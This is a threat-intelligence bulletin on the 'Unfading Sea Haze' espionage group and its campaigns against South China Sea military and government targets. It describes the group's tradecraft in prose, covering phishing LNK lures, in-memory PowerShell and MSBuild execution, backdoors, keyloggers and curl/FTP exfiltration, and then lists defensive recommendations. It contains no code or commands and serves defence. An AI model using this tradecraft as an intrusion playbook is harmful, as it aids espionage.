Chinese Hackers Hide on Military and Govt Networks for 6 Years

Bitdefender researchers have uncovered a previously unknown threat actor named "Unfading Sea Haze," which has been targeting military and government entities in the South China Sea region since 2018. The group's activities align with Chinese geopolitical interests, focusing on intelligence collection and espionage, and share operational techniques with other Chinese state-sponsored groups, particularly APT41.

Unfading Sea Haze initiates attacks with spear-phishing emails containing malicious ZIP archives that house LNK files disguised as documents. Recent lures are U.S. political topics, and the ZIP files are deceptively named to appear as Windows Defender installers. The LNK files include obfuscated PowerShell commands that check for an ESET executable (ekrn[.]exe). If not found, the PowerShell script uses MSBuild to execute malware directly into memory from a remote SMB server, leaving no trace on the victim's machine.

The MSBuild-executed code is a backdoor named 'SerialPktdoor,' which allows remote control over the compromised system. The attackers maintain persistence by manipulating local administrator accounts and employing scheduled tasks to sideload malicious DLLs. Unfading Sea Haze uses various custom tools, including a keylogger named 'xkeylog' for capturing keystrokes, info-stealers targeting data from browsers like Chrome, Firefox, and Edge, and several Gh0stRAT variants SilentGh0st, InsidiousGh0st, TranslucentGh0st, EtherealGh0st, and FluffyGh0st offering extensive functionality and stealth.

Security Officer Comments:
The group employs a custom tool called 'DustyExfilTool' for secure data extraction via TLS over TCP, with recent attacks switching to curl utility and FTP for exfiltration using dynamically generated credentials. They also use Ps2dllLoader for in-memory .NET or PowerShell code execution and 'SharpJSHandler' as a web shell for executing JavaScript code. More recent attacks show that the threat actors have switched to a curl utility and the FTP protocol for data exfiltration, now also using dynamically generated credentials that are changed frequently.

Suggested Corrections:
Researchers at Bitdefender recommend the following to mitigate the risks posed by the Unfading Sea Haze threat actor and similar groups:

  • Vulnerability Management: Start with prevention - companies must prioritize patch management to swiftly identify and address critical vulnerabilities. Implementing robust processes for patch deployment can significantly reduce the attack surface and mitigate the risk of exploitation. Prioritize addressing vulnerabilities with high CVSS scores, particularly for servers exposed to the internet that can lead to remote code execution.
  • Strong Authentication: Start with enforcing strong password policies that require complex characters and regular changes. Avoid password reuse across accounts. For an extra layer of protection, enable Multi-Factor Authentication (MFA) whenever possible. MFA significantly reduces the risk of unauthorized access even if your password is compromised. To future-proof your security posture, consider exploring passwordless authentication options compliant with the FIDO2 standard.
  • Proper Network Segmentation: Implementing proper network segmentation and adopting a zero trust networking model are crucial steps in enhancing security posture. By segmenting the network into smaller, more manageable zones and enforcing strict access controls based on the principle of least privilege, organizations can limit the lateral movement of threat actors and minimize the potential impact of a breach.
  • Multilayered Defense: Adopting a multilayered security approach is essential. Organizations should invest in a diverse range of security controls, including network segmentation and endpoint protection to create overlapping layers of defense against cyber threats.
  • Network Traffic Monitoring: Maintain network traffic monitoring to identify unusual communication patterns that might indicate remote code execution or cloud storage interactions employed by malware. Additionally, web filtering solutions can help block access to malicious websites that might be used for malware distribution.
  • Effective Logging: Ensure logging is enabled, functional, and provides sufficient information and historical data for effective support when needed. Robust logging mechanisms can aid in post-incident analysis, forensic investigations, and monitoring for suspicious activities. Regularly review and update logging configurations to capture relevant security events and maintain visibility across the environment.
  • Detection and Response: Despite your best efforts, it is still possible that modern threat actors will make it past your prevention and protection controls. his is where your detection and response capabilities come into play. Whether you get these capabilities as-a-product (EDR/XDR) or as-a-service (MDR), the purpose is to minimize the time when threat actors remain undetected.
  • Collaboration and Information Sharing: Foster collaboration within the cybersecurity community to share threat intelligence and best practices. By participating in information-sharing initiatives and collaborating with industry peers, organizations can gain valuable insights into emerging threats and enhance their cyber resilience.